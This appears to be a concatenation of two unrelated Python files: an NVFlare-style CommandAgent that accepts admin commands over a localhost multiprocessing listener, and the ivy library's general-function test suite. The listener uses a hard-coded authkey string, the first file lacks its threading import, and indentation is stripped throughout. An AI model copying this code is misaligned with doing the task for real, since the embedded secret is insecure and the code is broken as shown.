from multiprocessing.connection import Listener
from nvflare.apis.fl_context import FLContext
from .admin_commands import AdminCommands
class CommandAgent(object):
def __init__(self, federated_client, listen_port, client_runner) -> None:
self.federated_client = federated_client
self.listen_port = int(listen_port)
self.client_runner = client_runner
self.thread = None
self.asked_to_stop = False
self.commands = AdminCommands.commands
def start(self, fl_ctx: FLContext):
# self.thread = threading.Thread(target=listen_command, args=[federated_client, int(listen_port), client_runner])
self.thread = threading.Thread(target=listen_command, args=[self, fl_ctx])
self.thread.start()
pass
def listen_command(self, fl_ctx):
try:
address = ("localhost", self.listen_port) # family is deduced to be 'AF_INET'
listener = Listener(address, authkey="client process secret password".encode())
conn = listener.accept()
print(f"Created the listener on port: {self.listen_port}")
try:
while not self.asked_to_stop:
if conn.poll(1.0):
msg = conn.recv()
command_name = msg.get("command")
data = msg.get("data")
command = AdminCommands.get_command(command_name)
if command:
engine = fl_ctx.get_engine()
with engine.new_context() as new_fl_ctx:
reply = command.process(data=data, fl_ctx=new_fl_ctx)
if reply:
conn.send(reply)
except Exception as e:
# traceback.print_exc()
print(f"Process communication exception: {self.listen_port}.")
finally:
conn.close()
listener.close()
except Exception as e:
print(f"Could not create the listener for this process on port: {self.listen_port}.")
pass
def shutdown(self):
self.asked_to_stop = True
if self.thread and self.thread.is_alive():
self.thread.join()
def listen_command(agent: CommandAgent, fl_ctx: FLContext):
agent.listen_command(fl_ctx)
|
test_general.py
|
"""Collection of tests for unified general functions."""
# global
import time
import einops
import jax.numpy as jnp
import pytest
from hypothesis import given, strategies as st
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import threading
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
import ivy.functional.backends.numpy as ivy_np
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
length = len(lst[0])
if not all(len(item) == length for item in lst):
msg = "not all lists have the same length"
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@given(fw_str=st.sampled_from(["numpy", "jax", "torch", "mxnet"]))
def test_set_framework(fw_str, device, call):
ivy.set_backend(fw_str)
ivy.unset_backend()
# use_framework
def test_use_within_use_framework(device, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@given(allow_duplicates=st.booleans())
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
def func_b(a, d, e=5):
return None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {"a": 0, "b": 1, "c": 2, "d": 3, "e": 4, "f": 5, "g": 6}
kwfa, kwfb, kwca = ivy.match_kwargs(
kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates
)
if allow_duplicates:
assert kwfa == {"a": 0, "b": 1, "c": 2}
assert kwfb == {"a": 0, "d": 3, "e": 4}
assert kwca == {"c": 2, "f": 5, "g": 6}
else:
assert kwfa == {"a": 0, "b": 1, "c": 2}
assert kwfb == {"d": 3, "e": 4}
assert kwca == {"f": 5, "g": 6}
def test_get_referrers_recursive(device, call):
class SomeClass:
def __init__(self):
self.x = [1, 2]
self.y = [self.x]
some_obj = SomeClass()
refs = ivy.get_referrers_recursive(some_obj.x)
ref_keys = refs.keys()
assert len(ref_keys) == 3
assert "repr" in ref_keys
assert refs["repr"] == "[1,2]"
y_id = str(id(some_obj.y))
y_refs = refs[y_id]
assert y_refs["repr"] == "[[1,2]]"
some_obj_dict_id = str(id(some_obj.__dict__))
assert y_refs[some_obj_dict_id] == "tracked"
dict_refs = refs[some_obj_dict_id]
assert dict_refs["repr"] == "{'x':[1,2],'y':[[1,2]]}"
some_obj_id = str(id(some_obj))
some_obj_refs = dict_refs[some_obj_id]
assert some_obj_refs["repr"] == str(some_obj).replace(" ", "")
assert len(some_obj_refs) == 1
# copy array
@given(dtype_and_x=helpers.dtype_and_values(ivy_np.valid_dtypes))
def test_copy_array(dtype_and_x, device, call, fw):
dtype, x = dtype_and_x
if fw == "torch" and dtype in ["uint16", "uint32", "uint64"]:
return
if call in [helpers.mx_call] and dtype == "int16":
# mxnet does not support int16
return
# smoke test
x = ivy.array(x, dtype=dtype, device=device)
ret = ivy.copy_array(x)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
helpers.assert_all_close(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# array_equal
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes, n_arrays=2))
def test_array_equal(x0_n_x1_n_res, device, call, fw):
dtype0, x0 = x0_n_x1_n_res[0][0], x0_n_x1_n_res[1][0]
dtype1, x1 = x0_n_x1_n_res[0][1], x0_n_x1_n_res[1][1]
if fw == "torch" and (
dtype0 in ["uint16", "uint32", "uint64"]
or dtype1 in ["uint16", "uint32", "uint64"]
):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and (
dtype0 in ["int16", "bool"] or dtype1 in ["int16", "bool"]
):
# mxnet does not support int16, and does not support
# bool for broadcast_equal method used
return
# smoke test
x0 = ivy.array(x0, dtype=dtype0, device=device)
x1 = ivy.array(x1, dtype=dtype1, device=device)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_ivy_array(x0)
assert ivy.is_ivy_array(x1)
assert isinstance(res, bool) or ivy.is_ivy_array(res)
# value test
assert res == np.array_equal(np.array(x0, dtype=dtype0), np.array(x1, dtype=dtype1))
# arrays_equal
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes, n_arrays=3))
def test_arrays_equal(x0_n_x1_n_res, device, call, fw):
dtype0, x0 = x0_n_x1_n_res[0][0], x0_n_x1_n_res[1][0]
dtype1, x1 = x0_n_x1_n_res[0][1], x0_n_x1_n_res[1][1]
dtype2, x2 = x0_n_x1_n_res[0][2], x0_n_x1_n_res[1][2]
if fw == "torch" and (
dtype0 in ["uint16", "uint32", "uint64"]
or dtype1 in ["uint16", "uint32", "uint64"]
or dtype2 in ["uint16", "uint32", "uint64"]
):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and (
dtype0 in ["int16", "bool"] or dtype1 in ["int16", "bool"]
):
# mxnet does not support int16, and does not support bool
# for broadcast_equal method used
return
# smoke test
x0 = ivy.array(x0, dtype=dtype0, device=device)
x1 = ivy.array(x1, dtype=dtype1, device=device)
x2 = ivy.array(x2, dtype=dtype2, device=device)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_ivy_array(x0)
assert ivy.is_ivy_array(x1)
assert ivy.is_ivy_array(x2)
assert isinstance(res, bool) or ivy.is_ivy_array(res)
# value test
true_res = (
np.array_equal(ivy.to_numpy(x0), ivy.to_numpy(x1))
and np.array_equal(ivy.to_numpy(x0), ivy.to_numpy(x2))
and np.array_equal(ivy.to_numpy(x1), ivy.to_numpy(x2))
)
assert res == true_res
# to_numpy
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes))
def test_to_numpy(x0_n_x1_n_res, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if fw == "torch" and (dtype in ["uint16", "uint32", "uint64"]):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and dtype == "int16":
# mxnet does not support int16
return
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
return
# smoke test
ret = ivy.to_numpy(ivy.array(object_in, dtype=dtype, device=device))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
helpers.assert_all_close(ret, np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@given(
object_in=st.sampled_from([[0.0], [[[1]]], [True], [[1.0]]]),
dtype=st.sampled_from(ivy_np.valid_dtypes),
)
def test_to_scalar(object_in, dtype, device, call, fw):
if fw == "torch" and (dtype in ["uint16", "uint32", "uint64"]):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and dtype == "int16":
# mxnet does not support int16
return
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
return
# smoke test
ret = ivy.to_scalar(ivy.array(object_in, dtype=dtype, device=device))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(ivy.array(object_in, dtype=dtype, device=device)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes))
def test_to_list(x0_n_x1_n_res, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
return
# smoke test
arr = ivy.array(object_in, dtype=dtype, device=device)
ret = ivy.to_list(arr)
# type test (result won't be a list if input is 0 dimensional
if arr.ndim != 0:
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(
np.nan_to_num(
np.asarray(ivy.to_list(ivy.array(object_in, dtype=dtype, device=device))),
posinf=np.inf,
neginf=-np.inf,
),
np.nan_to_num(np.array(object_in).astype(dtype), posinf=np.inf, neginf=-np.inf),
)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@given(
x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes),
as_tensor=st.booleans(),
tensor_fn=st.sampled_from([ivy.array, helpers.var_fn]),
)
def test_shape(x0_n_x1_n_res, as_tensor, tensor_fn, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if fw == "torch" and (
dtype in ["uint16", "uint32", "uint64"]
or (dtype not in ivy_np.valid_float_dtypes and tensor_fn == helpers.var_fn)
):
# torch does not support those dtypes
return
ret = ivy.shape(tensor_fn(object_in, dtype=dtype, device=device), as_tensor)
# type test
if as_tensor:
assert ivy.is_ivy_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(
ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32)
)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@given(
x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes),
as_tensor=st.booleans(),
tensor_fn=st.sampled_from([ivy.array, helpers.var_fn]),
)
def test_get_num_dims(x0_n_x1_n_res, as_tensor, tensor_fn, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if fw == "torch" and (
dtype in ["uint16", "uint32", "uint64"]
or (dtype not in ivy_np.valid_float_dtypes and tensor_fn == helpers.var_fn)
):
# torch does not support those dtypes
return
ret = ivy.get_num_dims(tensor_fn(object_in, dtype=dtype, device=device), as_tensor)
# type test
if as_tensor:
assert ivy.is_ivy_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(
ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32)
)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# clip_vector_norm
@pytest.mark.parametrize(
"x_max_norm_n_p_val_clipped",
[
(-0.5, 0.4, 2.0, -0.4),
([1.7], 1.5, 3.0, [1.5]),
(
[[0.8, 2.2], [1.5, 0.2]],
4.0,
1.0,
[[0.6808511, 1.8723406], [1.2765958, 0.17021278]],
),
(
[[0.8, 2.2], [1.5, 0.2]],
2.5,
2.0,
[[0.71749604, 1.9731141], [1.345305, 0.17937401]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(
x_max_norm_n_p_val_clipped, dtype, with_out, tensor_fn, device, call
):
# smoke test
if call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype=dtype, device=device)
max_norm = x_max_norm_n_p_val_clipped[1]
p_val = x_max_norm_n_p_val_clipped[2]
clipped = x_max_norm_n_p_val_clipped[3]
if with_out:
out = ivy.zeros(x.shape if len(x.shape) else (1,))
ret = ivy.clip_vector_norm(x, max_norm, p_val, out=out)
else:
ret = ivy.clip_vector_norm(x, max_norm, p_val)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == (x.shape if len(x.shape) else (1,))
# value test
assert np.allclose(
call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped)
)
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# compilation test
if call is helpers.torch_call:
# pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
return
# floormod
# @given(
# xy=helpers.dtype_and_values(ivy_np.valid_numeric_dtypes, n_arrays=2),
# as_variable=st.booleans(),
# with_out=st.booleans(),
# num_positional_args=st.integers(1, 2),
# native_array=st.booleans(),
# container=st.booleans(),
# instance_method=st.booleans(),
# )
# def test_floormod(
# xy,
# as_variable,
# with_out,
# num_positional_args,
# native_array,
# container,
# instance_method,
# device,
# call,
# fw,
# ):
# # smoke test
# dtype = xy[0]
# x = xy[1][0]
# divisor = np.abs(xy[1][1])
# if 0 in divisor:
# return
# if fw == "torch" and any(d in ["uint16", "uint32", "uint64"] for d in dtype):
# return
# helpers.test_array_function(
# dtype,
# as_variable,
# with_out,
# num_positional_args,
# native_array,
# container,
# instance_method,
# fw,
# "floormod",
# x=np.asarray(x, dtype=dtype[0]),
# y=np.asarray(divisor, dtype=dtype[1]),
# )
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0.0, 1.0, 2.0]], 0), ([[0.0, 1.0, 2.0]], 1)]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, device, call):
# smoke test
x, axis = x_n_axis
if (
isinstance(x, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (
axis % len(x.shape)
if (axis is not None and len(x.shape) != 0)
else len(x.shape) - 1
)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(
call(ivy.unstack, x, axis),
np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)),
)
# fourier_encode
@pytest.mark.parametrize(
"x_n_mf_n_nb_n_gt",
[
(
[2.0],
4.0,
4,
[
[
2.0000000e00,
1.7484555e-07,
9.9805772e-01,
-5.2196848e-01,
3.4969111e-07,
1.0000000e00,
-6.2295943e-02,
-8.5296476e-01,
1.0000000e00,
]
],
),
(
[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[2.0, 4.0],
4,
[
[
[
1.0000000e00,
-8.7422777e-08,
-8.7422777e-08,
-8.7422777e-08,
-8.7422777e-08,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
],
[
2.0000000e00,
1.7484555e-07,
9.9805772e-01,
-5.2196848e-01,
-6.0398321e-07,
1.0000000e00,
-6.2295943e-02,
-8.5296476e-01,
1.0000000e00,
],
],
[
[
3.0000000e00,
-2.3849761e-08,
-2.3849761e-08,
-2.3849761e-08,
-2.3849761e-08,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
],
[
4.0000000e00,
3.4969111e-07,
-1.2434989e-01,
8.9044148e-01,
-1.2079664e-06,
1.0000000e00,
-9.9223840e-01,
4.5509776e-01,
1.0000000e00,
],
],
[
[
5.0000000e00,
-6.7553248e-07,
-6.7553248e-07,
-6.7553248e-07,
-6.7553248e-07,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
],
[
6.0000000e00,
4.7699523e-08,
-9.8256493e-01,
-9.9706185e-01,
-3.7192983e-06,
1.0000000e00,
1.8591987e-01,
7.6601014e-02,
1.0000000e00,
],
],
],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, device, call):
# smoke test
x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
if (
isinstance(x, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype=dtype, device=device)
if isinstance(max_freq, list):
max_freq = tensor_fn(max_freq, dtype=dtype, device=device)
ret = ivy.fourier_encode(x, max_freq, num_bands)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else list(x.shape)
expected_shape = x_shape + [1 + 2 * num_bands]
assert list(ret.shape) == expected_shape
# value test
assert np.allclose(
call(ivy.fourier_encode, x, max_freq, num_bands),
np.array(ground_truth),
atol=1e-5,
)
# indices_where
@pytest.mark.parametrize("x", [[True], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, device, call):
# smoke test
if (
isinstance(x, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.indices_where(x)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(
call(ivy.indices_where, x),
np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))),
)
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, device, call):
# smoke test
ind, depth = ind_n_depth
if (
isinstance(ind, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, dtype="int32", device=device)
ret = ivy.one_hot(ind, depth, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(
call(ivy.one_hot, ind, depth, device=device),
np.asarray(
ivy.functional.backends.numpy.one_hot(
ivy.to_numpy(ind), depth, device=device
)
),
)
# cumsum
@pytest.mark.parametrize(
"x_n_axis",
[
([[0.0, 1.0, 2.0]], -1),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 0),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 1),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, with_out, tensor_fn, device, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype=dtype, device=device)
if with_out:
if ivy.exists(axis):
out = ivy.zeros(x.shape)
ret = ivy.cumsum(x, axis, out=out)
else:
out = ivy.zeros(ivy.reshape(x, (-1,)).shape)
ret = ivy.cumsum(x, axis, out=out)
else:
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(
call(ivy.cumsum, x, axis),
np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)),
)
# out test
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# cumprod
@pytest.mark.parametrize(
"x_n_axis",
[
([[0.0, 1.0, 2.0]], -1),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 0),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 1),
],
)
@pytest.mark.parametrize("exclusive", [True, False])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, with_out, tensor_fn, device, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype=dtype, device=device)
if with_out:
if ivy.exists(axis):
out = ivy.zeros(x.shape)
ret = ivy.cumprod(x, axis, exclusive=exclusive, out=out)
else:
out = ivy.zeros(ivy.reshape(x, (-1,)).shape)
ret = ivy.cumprod(x, axis, exclusive=exclusive, out=out)
else:
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(
call(ivy.cumprod, x, axis, exclusive),
np.asarray(
ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)
),
)
# out test
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup",
[
([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True),
],
)
@pytest.mark.parametrize("red", ["sum", "min", "max", "replace"])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(
inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, device, call
):
# smoke test
if red in ("sum", "min", "max") and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, dtype="int32", device=device)
upd = tensor_fn(upd, dtype=dtype, device=device)
if tensor:
# pytorch variables do not support in-place updates
tensor = (
ivy.array(tensor, dtype=dtype, device=device)
if ivy.current_backend_str() == "torch"
else tensor_fn(tensor, dtype=dtype, device=device)
)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == "replace" and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
assert np.allclose(
call(ivy.scatter_flat, inds, upd, size, tensor, red, device=device),
np.asarray(
ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds),
ivy.to_numpy(upd),
size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor,
red,
device=device,
)
),
)
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[
([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False),
([[0, 1, 2]], [1], [3, 3, 3], None, False),
(
[[0], [2]],
[
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
],
[4, 4, 4],
None,
False,
),
(
[[0, 1, 2]],
[1],
None,
[
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]],
],
False,
),
],
)
@pytest.mark.parametrize("red", ["sum", "min", "max", "replace"])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(
inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, device, call
):
# smoke test
if red in ("sum", "min", "max") and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, dtype="int32", device=device)
upd = tensor_fn(upd, dtype=dtype, device=device)
if tensor:
# pytorch variables do not support in-place updates
tensor = (
ivy.array(tensor, dtype=dtype, device=device)
if ivy.current_backend_str() == "torch"
else tensor_fn(tensor, dtype=dtype, device=device)
)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == "replace" and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, device=device)
true = np.asarray(
ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds),
ivy.to_numpy(upd),
shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor,
red,
device=device,
)
)
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis",
[
([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, with_out, tensor_fn, device, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype=dtype, device=device)
inds = ivy.array(inds, dtype="int32", device=device)
if with_out:
out = ivy.zeros(inds.shape)
ret = ivy.gather(prms, inds, axis, device=device, out=out)
else:
ret = ivy.gather(prms, inds, axis, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(
call(ivy.gather, prms, inds, axis, device=device),
np.asarray(
ivy.functional.backends.numpy.gather(
ivy.to_numpy(prms), ivy.to_numpy(inds), axis, device=device
)
),
)
# out test
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds",
[
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
(
[[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]],
[[[0, 1, 0]], [[1, 0, 1]]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, device, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype=dtype, device=device)
inds = ivy.array(inds, dtype="int32", device=device)
ret = ivy.gather_nd(prms, inds, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1] :]
# value test
assert np.allclose(
call(ivy.gather_nd, prms, inds, device=device),
np.asarray(
ivy.functional.backends.numpy.gather_nd(
ivy.to_numpy(prms), ivy.to_numpy(inds), device=device
)
),
)
# exists
@pytest.mark.parametrize("x", [[1.0], None, [[10.0, 9.0, 8.0]]])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, device, call):
# smoke test
x = tensor_fn(x, dtype=dtype, device=device) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.0], [2.0]), (None, [2.0]), ([[10.0, 9.0, 8.0]], [2.0])]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, device, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype=dtype, device=device) if x is not None else None
dv = tensor_fn(dv, dtype=dtype, device=device)
ret = ivy.default(x, dv)
# type test
assert ivy.is_ivy_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
def test_cache_fn(device, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
